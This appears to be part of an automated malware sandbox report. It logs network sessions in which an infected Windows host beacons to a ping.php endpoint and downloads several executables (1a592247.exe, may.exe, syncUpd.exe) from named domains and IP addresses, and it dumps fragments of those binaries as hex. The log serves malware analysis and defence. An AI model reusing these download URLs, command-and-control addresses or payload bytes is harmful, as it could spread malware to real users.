Feb 21, 2024 00:22:36.009010077 CET	1286	IN	Data Raw: e8 f9 3d 6e 00 21 c3 f8 ff 21 8b de 56 b9 f0 d8 0b f9 06 b7 c0 05 02 99 d0 ed c6 7c 3b 06 08 06 f0 6c 5d f1 8b cc 55 f9 ec 64 8b 04 08 55 c0 85 0f fd c0 06 10 ff 0e b7 c9 46 02 cc d1 f1 c6 36 3b 04 0c 14 ec 30 5d bb 8b 8c 55 ff ec b1 3d f2 7a b3 Data Ascii: =n!!V\|;l]UdUF6;0]U=zrt+hz2sYFu;gHqY#AxhqZhC3(YB;@t;J2`2u$qcp3+t)h2sYFXY]%2 rX[nYeGq9/h,rq
Feb 21, 2024 00:22:36.180713892 CET	1286	IN	Data Raw: 0b 46 05 b1 fb 37 75 63 8b 77 d4 f8 47 06 83 95 08 0d 06 f8 45 a4 89 75 64 01 c0 db 92 6e 00 32 c3 fa ff 33 8b 82 51 29 53 f8 5d 7c 56 65 33 c4 33 cc 89 0f fc 09 1c 8c 10 b7 80 6e 74 71 47 fa 7d 88 83 cd 17 40 ee b0 ff 65 0f b1 77 70 00 66 6a 6d Data Ascii: F7ucwGEudn23Q)S]\|Ve33ntqG}@ewpfjm)Ms-=rX@+nY=23qnxAu2h1qSqxW82dV'V0x`h62m2V saB2uThlxVb82!P6P>s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49722	186.147.159.149	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:22:43.645922899 CET	162	OUT	GET /check/index.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: trmpc.com
Feb 21, 2024 00:22:44.190226078 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Tue, 20 Feb 2024 23:22:44 GMT Content-Type: application/octet-stream Connection: close Content-Description: File Transfer Content-Disposition: attachment; filename=1a592247.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5b b2 68 ef 1f d3 06 bc 1f d3 06 bc 1f d3 06 bc 70 a5 ad bc 06 d3 06 bc 70 a5 98 bc 0c d3 06 bc 70 a5 ac bc 74 d3 06 bc 16 ab 95 bc 18 d3 06 bc 1f d3 07 bc 77 d3 06 bc 70 a5 a9 bc 1e d3 06 bc 70 a5 9c bc 1e d3 06 bc 70 a5 9b bc 1e d3 06 bc 52 69 63 68 1f d3 06 bc 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 18 37 5c 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 ac 01 00 00 e4 3f 00 00 00 00 00 af 15 00 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 41 00 00 04 00 00 ff 80 02 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 e0 01 00 50 00 00 00 00 50 41 00 d0 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 de ab 01 00 00 10 00 00 00 ac 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 29 00 00 00 c0 01 00 00 2a 00 00 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 5f 3f 00 00 f0 01 00 00 2c 00 00 00 da 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 26 00 00 00 50 41 00 00 28 00 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$[hppptwpppRichPEL7\c?@APPA&.text `.rdata)*@@.data,_?,@.rsrc&PA(@@
Feb 21, 2024 00:22:44.190429926 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 0d 04 f0 41 00 75 02 f3 c3 e9 aa 05 00 00 cc 83 3d 1c 3f Data Ascii: ;Au=?~\$D$%=u<$f$ffd$M~D$f(Af(f(fs4f~fTAfftL=\|}f=2fL$D$f.{$T$
Feb 21, 2024 00:22:44.191716909 CET	324	IN	Data Raw: f7 2c 00 00 85 c0 75 08 6a 10 e8 42 ff ff ff 59 e8 a1 29 00 00 89 75 fc e8 54 27 00 00 85 c0 79 08 6a 1b e8 5d 09 00 00 59 ff 15 ac c0 41 00 a3 24 3f 81 00 e8 e0 26 00 00 a3 28 10 42 00 e8 28 26 00 00 85 c0 79 08 6a 08 e8 37 09 00 00 59 e8 e5 23 Data Ascii: ,ujBY)uT'yj]YA$?&(B(&yj7Y#yj&YjY;tPY{#EtMjYQPVh@E9uuP.EMPQ!YYeEE}uPEEW-
Feb 21, 2024 00:22:44.191836119 CET	1286	IN	Data Raw: 2d 14 11 42 00 9c 8f 05 48 11 42 00 8b 45 00 a3 3c 11 42 00 8b 45 04 a3 40 11 42 00 8d 45 08 a3 4c 11 42 00 8b 85 e0 fc ff ff c7 05 88 10 42 00 01 00 01 00 a1 40 11 42 00 a3 3c 10 42 00 c7 05 30 10 42 00 09 04 00 c0 c7 05 34 10 42 00 01 00 00 00 Data Ascii: -BHBE<BE@BELBB@B<B0B4BAAABjS-YjAhAA=Buj/-YhAPAU(3EE9TBt5 ?AC@MV;
Feb 21, 2024 00:22:44.350655079 CET	1286	IN	Data Raw: 45 0c 73 0f e8 9a ff ff ff c7 00 0c 00 00 00 33 c0 5d c3 0f af 4d 0c 56 8b f1 85 f6 75 01 46 33 c0 83 fe e0 77 13 56 6a 08 ff 35 b8 19 42 00 ff 15 a0 c0 41 00 85 c0 75 32 83 3d c0 19 42 00 00 74 1c 56 e8 4c 05 00 00 59 85 c0 75 d2 8b 45 10 85 c0 Data Ascii: Es3]MVuF3wVj5BAu2=BtVLYuEt3Mt^]UhAAthAPLAtu]UuYuAj}3Yj2YV"VVV5V5V3V3
Feb 21, 2024 00:22:44.351242065 CET	1286	IN	Data Raw: 50 88 5d fb e8 3f 33 00 00 59 50 8d 85 08 fe ff ff 50 56 ff 15 d8 c0 41 00 8b 4d fc 5f 5e 33 cd 5b e8 c2 ef ff ff c9 c3 6a 03 e8 d0 36 00 00 59 83 f8 01 74 15 6a 03 e8 c3 36 00 00 59 85 c0 75 1f 83 3d 00 f0 41 00 01 75 16 68 fc 00 00 00 e8 25 fe Data Ascii: P]?3YPPVAM_^3[j6Ytj6Yu=Auh%hYYjhjA3BUEB]U5BAtuYt3@]3]UEVFucFHlHhN;HAtAHpu
Feb 21, 2024 00:22:44.351727962 CET	1286	IN	Data Raw: cc cc 8b ff 55 8b ec 83 ec 18 53 8b 5d 0c 56 8b 73 08 33 35 04 f0 41 00 57 8b 06 c6 45 ff 00 c7 45 f4 01 00 00 00 8d 7b 10 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 a7 ea ff ff 8b 4e 0c 8b 46 08 03 cf 33 0c 38 e8 97 ea ff ff 8b 45 08 f6 40 04 66 Data Ascii: US]Vs35AWEE{tN38NF38E@fMUS[EMt_I[LDEEt?Ex@GEu}t$tN38$NV3:E_^[]EM9csmu)=?
Feb 21, 2024 00:22:44.351799965 CET	1286	IN	Data Raw: ff 89 85 e8 fd ff ff 89 85 d0 fd ff ff 89 85 bc fd ff ff 89 85 c8 fd ff ff e8 8c f6 ff ff 85 f6 75 2b e8 6a f0 ff ff c7 00 16 00 00 00 e8 bb 0c 00 00 80 bd b0 fd ff ff 00 74 0a 8b 85 ac fd ff ff 83 60 70 fd 83 c8 ff e9 e4 0a 00 00 f6 46 0c 40 75 Data Ascii: u+jt`pF@u^VT=YAtt-A$utt-@$q3;g39G9&
Feb 21, 2024 00:22:44.351878881 CET	1286	IN	Data Raw: ff 01 00 00 00 8d 85 f4 fd ff ff 89 85 e4 fd ff ff e9 2f 04 00 00 8b 03 83 c3 04 89 9d d8 fd ff ff 3b c6 74 3b 8b 48 04 3b ce 74 34 f7 85 f0 fd ff ff 00 08 00 00 0f bf 00 89 8d e4 fd ff ff 74 14 99 2b c2 d1 f8 c7 85 c8 fd ff ff 01 00 00 00 e9 ea Data Ascii: /;t;H;t4t+AP#Ypeg4itqnt(otaU3: tff
Feb 21, 2024 00:22:44.352179050 CET	1286	IN	Data Raw: dc fd ff ff 8b cf b0 30 4b e8 f6 f4 ff ff 83 bd dc fd ff ff ff 74 04 85 db 7f e3 83 bd c8 fd ff ff 00 8b 9d e0 fd ff ff 74 54 85 db 7e 50 8b b5 e4 fd ff ff 0f b7 06 50 6a 06 8d 45 f4 50 8d 85 90 fd ff ff 50 4b 83 c6 02 e8 32 36 00 00 83 c4 10 85 Data Ascii: 0KttT~PPjEPPK26u tEPYuY\|.t% KHtt0Y
Feb 21, 2024 00:22:44.352251053 CET	1286	IN	Data Raw: 47 57 e8 b3 ea ff ff 8b d8 59 59 89 1d 70 13 42 00 85 db 75 05 83 c8 ff eb 65 8b 35 28 10 42 00 eb 35 56 e8 3b 1d 00 00 66 83 3e 3d 59 8d 78 01 74 22 6a 02 57 e8 80 ea ff ff 59 59 89 03 85 c0 74 41 56 57 50 e8 34 1d 00 00 83 c4 0c 85 c0 75 49 83 Data Ascii: GWYYpBue5(B5V;f>=Yxt"jWYYtAVWP4uI4~f>u5(Bt+%(B#?3Y[_^5pBN+%pB3PPPPPUQV3W}9UtME1f8"u}3j"Ytff

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49724	172.67.221.35	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:22:46.189865112 CET	173	OUT	GET /data/pdf/may.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: mobile.sunaviat.com
Feb 21, 2024 00:22:46.488332033 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:22:46 GMT Content-Type: application/octet-stream Content-Length: 4754167 Connection: keep-alive Content-Description: File Transfer Content-Disposition: attachment; filename=may.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hymOolv1juA%2FtTW6obbOzjvIuejBZovzH0jNEXEljH7MQcs7qYBtYpMQ0PuMtsHTjTtSJA3aLUptC4HI7bR%2BFdCMlZHHbeR3Tm8P%2FMuT%2B1nwJdjyEfHoNfk043Zom5ttFcPWmZgW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a7e56ea9f436f-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 40 9c 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 64 93 00 00 00 10 00 00 00 94 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*F@@@@P,CODEd
Feb 21, 2024 00:22:46.488379002 CET	1286	IN	Data Raw: 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 4c 02 00 00 00 b0 00 00 00 04 00 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 88 0e 00 00 00 c0 00 00 00 00 00 00 00 9c Data Ascii: `DATAL@BSS.idataP@.tls.rdata@P.reloc
Feb 21, 2024 00:22:46.488466978 CET	1286	IN	Data Raw: 5b c3 8b 50 04 8b 08 89 0a 89 51 04 8b 15 38 c4 40 00 89 10 a3 38 c4 40 00 c3 53 56 57 55 51 8b f1 89 14 24 8b e8 8b 5d 00 8b 04 24 8b 10 89 16 8b 50 04 89 56 04 8b 3b 8b 43 08 8b d0 03 53 0c 3b 16 75 14 8b c3 e8 b7 ff ff ff 8b 43 08 89 06 8b 43 Data Ascii: [PQ8@8@SVWUQ$]$PV;CS;uCCFV;uCF;uUu3Z]_^[@SVWU2C;rlJk;w^;uBCB)C{uD5;r{;u)s&J$+\|$
Feb 21, 2024 00:22:46.488492012 CET	1286	IN	Data Raw: 24 0c 00 0f 85 66 ff ff ff 8d 4c 24 0c 8b 54 24 08 8b 44 24 04 e8 da fc ff ff 8b 04 24 33 d2 89 10 eb 48 8b 6b 08 3b f5 75 3a 3b 7b 0c 7f 35 8b 0c 24 8b d7 8b c5 e8 71 fd ff ff 8b 04 24 83 38 00 74 28 8b 04 24 8b 40 04 01 43 08 8b 04 24 8b 40 04 Data Ascii: $fL$T$D$$3Hk;u:;{5$q$8t($@C$@)C{u$3]_^[SVW$?4$;s[+L$L@]\$tL$T$&D$D$D$D$\|$tT$L@
Feb 21, 2024 00:22:46.488518000 CET	1286	IN	Data Raw: 8b d6 c1 ea 02 a1 74 c4 40 00 8b 44 90 f4 85 c0 75 10 a1 74 c4 40 00 89 5c 90 f4 89 5b 04 89 1b eb 3a 8b 10 89 43 04 89 13 89 18 89 5a 04 eb 2c 81 fe 00 3c 00 00 7c 0d 8b d6 8b c7 e8 09 ff ff ff 84 c0 75 17 a1 68 c4 40 00 89 1d 68 c4 40 00 8b 10 Data Ascii: t@Dut@\[:CZ,<\|uh@h@CZ_^[=l@~@=l@}@+l@p@p@3p@3l@SVW<$L$x@<\$u3R;s)GG
Feb 21, 2024 00:22:46.488540888 CET	1286	IN	Data Raw: 00 00 00 03 da 8b f0 e8 90 f8 ff ff 81 e3 fc ff ff 7f 8b c6 03 c3 8b f8 3b 3d 70 c4 40 00 75 2c 29 1d 70 c4 40 00 01 1d 6c c4 40 00 81 3d 6c c4 40 00 00 3c 00 00 7e 05 e8 1f fb ff ff 33 c0 89 45 fc e8 e9 0c 00 00 e9 85 00 00 00 8b 10 f6 c2 02 74 Data Ascii: ;=p@u,)p@l@=l@<~3Et}@7)xt8tx}@P;@E3ZYYdh"@=2@th@E_^[Y]SVWU}
Feb 21, 2024 00:22:46.488563061 CET	1286	IN	Data Raw: 38 83 c0 08 83 c2 08 4e 75 e2 eb 06 83 c0 04 83 c2 04 5e 83 e6 03 74 36 8a 08 3a 0a 75 30 4e 74 13 8a 48 01 3a 4a 01 75 25 4e 74 08 8a 48 02 3a 4a 02 75 1a 31 c0 5e 5b c3 5e 38 d9 75 10 38 fd 75 0c c1 e9 10 c1 eb 10 38 d9 75 02 38 fd 5e 5b c3 90 Data Ascii: 8Nu^t6:u0NtH:Ju%NtH:Ju1^[^8u8u8u8^[Wfx_i,@B,@SVWPtQ11F t-tE+tB$tBt20w*9w&Fut\|Y12_^[F~[)
Feb 21, 2024 00:22:46.488590002 CET	1286	IN	Data Raw: 40 00 85 d2 0f 84 8b 00 00 00 ff d2 85 c0 0f 84 81 00 00 00 8b 54 24 0c e8 db fe ff ff 89 c2 8b 44 24 04 8b 48 0c 83 48 04 02 53 31 db 56 57 55 64 8b 1b 53 50 52 51 8b 54 24 28 6a 00 50 68 79 2c 40 00 52 e8 53 e5 ff ff 8b 7c 24 28 e8 d2 04 00 00 Data Ascii: @T$D$HHS1VWUdSPRQT$(jPhy,@RS\|$(o_G,@RA_D$@8tr@u@T$SVWUJYqt=
Feb 21, 2024 00:22:46.488615990 CET	1286	IN	Data Raw: 00 e8 05 0d 00 00 eb 0c 53 a1 d0 c3 40 00 50 e8 ca e0 ff ff 89 1d 8c c4 40 00 5b c3 8b c0 8a 0d 30 c0 40 00 8b 05 d0 c3 40 00 84 c9 75 28 64 8b 15 2c 00 00 00 8b 04 82 c3 e8 98 ff ff ff 8b 05 d0 c3 40 00 50 e8 8c e0 ff ff 85 c0 74 01 c3 8b 05 8c Data Ascii: S@P@[0@@u(d,@Pt@PzttJI\|JuBSVtJI\|JuBNu^[t#JAPRBXXRH\|ZXJtJI\|JuB
Feb 21, 2024 00:22:46.488651037 CET	423	IN	Data Raw: 00 00 8d 44 24 0c 50 53 57 6a 00 6a 00 e8 ce db ff ff 8b c8 8b d4 8b c6 e8 1f fc ff ff eb 33 6a 00 6a 00 6a 00 6a 00 53 57 6a 00 6a 00 e8 ae db ff ff 8b e8 8b c6 8b cd 33 d2 e8 fd fb ff ff 6a 00 6a 00 55 8b 06 50 53 57 6a 00 6a 00 e8 8e db ff ff Data Ascii: D$PSWjj3jjjjSWjj3jjUPSWjj]_^[@SVS]^[SVWU) =}+hD$PV'PjjPD$P"(jjVSjjUjUWVSjj
Feb 21, 2024 00:22:46.576752901 CET	1286	IN	Data Raw: e8 54 da ff ff 09 c0 0f 85 54 ff ff ff c3 8d 40 00 55 8b ec 83 c4 f0 53 56 57 8b f9 8b f2 8b d8 66 81 3b 00 01 75 3b 66 c7 45 f0 00 00 57 6a 00 68 00 04 00 00 56 8d 45 f0 50 e8 22 da ff ff 85 c0 74 05 e8 11 ff ff ff 8b c3 e8 1a ff ff ff 8b 45 f0 Data Ascii: TT@USVWf;u;fEWjhVEP"tEECECWjhVSt_^[]UQS3EBU!fEC[Y]@SVBfs^[USEff;uEf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49725	185.172.128.90	80	4144	C:\Users\user\AppData\Local\Temp\InstallSetup4.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:22:47.779656887 CET	152	OUT	GET /cpa/ping.php?substr=four&s=ab HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: 185.172.128.90 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:22:48.794161081 CET	204	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:22:47 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49726	185.172.128.127	80	4144	C:\Users\user\AppData\Local\Temp\InstallSetup4.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:22:50.524152994 CET	135	OUT	GET /syncUpd.exe HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: 185.172.128.127 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:22:50.695475101 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:22:50 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 20 Feb 2024 23:15:01 GMT ETag: "2d800-611d8612deca6" Accept-Ranges: bytes Content-Length: 186368 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 60 2a d4 5c 24 4b ba 0f 24 4b ba 0f 24 4b ba 0f 4b 3d 11 0f 3d 4b ba 0f 4b 3d 24 0f 37 4b ba 0f 4b 3d 10 0f 48 4b ba 0f 2d 33 29 0f 23 4b ba 0f 24 4b bb 0f 4c 4b ba 0f 4b 3d 15 0f 25 4b ba 0f 4b 3d 20 0f 25 4b ba 0f 4b 3d 27 0f 25 4b ba 0f 52 69 63 68 24 4b ba 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e2 93 49 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 56 02 00 00 e4 3f 00 00 00 00 00 d7 15 00 00 00 10 00 00 00 70 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 42 00 00 04 00 00 fb 90 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 90 02 00 50 00 00 00 00 00 42 00 d0 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 02 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6e 54 02 00 00 10 00 00 00 56 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 29 00 00 00 70 02 00 00 2a 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 5f 3f 00 00 a0 02 00 00 2c 00 00 00 84 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 26 00 00 00 00 42 00 00 28 00 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$`\$K$K$KK==KK=$7KK=HK-3)#K$KLKK=%KK= %KK='%KRich$KPELIdV?p@0BPB&p.textnTV `.rdata)pZ@@.data,_?,@.rsrc&B(@@
Feb 21, 2024 00:22:50.695521116 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 0d 04 a0 42 00 75 02 f3 c3 e9 d2 05 00 00 cc 83 3d 1c ef 81 00 00 0f 84 a6 09 00 00 83 ec 08 0f ae 5c 24 Data Ascii: ;Bu=\$D$%=u<$f$ffd$u~D$f(qBf(f(fs4f~fTrBfftL=\|}f=2fL$D$f.{$T$T$T$$
Feb 21, 2024 00:22:50.695559978 CET	1286	IN	Data Raw: 0f 95 c1 89 4d e4 e8 be 0b 00 00 85 c0 75 08 6a 1c e8 53 ff ff ff 59 e8 ff 2c 00 00 85 c0 75 08 6a 10 e8 42 ff ff ff 59 e8 a9 29 00 00 89 75 fc e8 5c 27 00 00 85 c0 79 08 6a 1b e8 5d 09 00 00 59 ff 15 ac 70 42 00 a3 24 ef 81 00 e8 e8 26 00 00 a3 Data Ascii: MujSY,ujBY)u\'yj]YpB$&(B0&yj7Y#yj&YjY;tPY#EtMjYQPVh@ME9uuP.EMPQ!YYeEE}uPE
Feb 21, 2024 00:22:50.695677996 CET	1286	IN	Data Raw: 45 08 59 59 0f b7 4d 0e 8b d8 b8 f0 7f 00 00 23 c8 51 51 dd 1c 24 66 3b c8 75 55 e8 c0 31 00 00 59 59 85 c0 7e 2d 83 f8 02 7e 1a 83 f8 03 75 23 dd 45 08 53 51 51 dd 1c 24 6a 0c e8 40 30 00 00 83 c4 10 eb 74 56 53 e8 de 32 00 00 dd 45 08 59 59 eb Data Ascii: EYYM#QQ$f;uU1YY~-~u#ESQQ$j@0tVS2EYYfESrB\$E$jjA*1]EYEYDzVS2EYY" uES\$E$jj0^[UE3;BtA-rHwjX]B]Dj
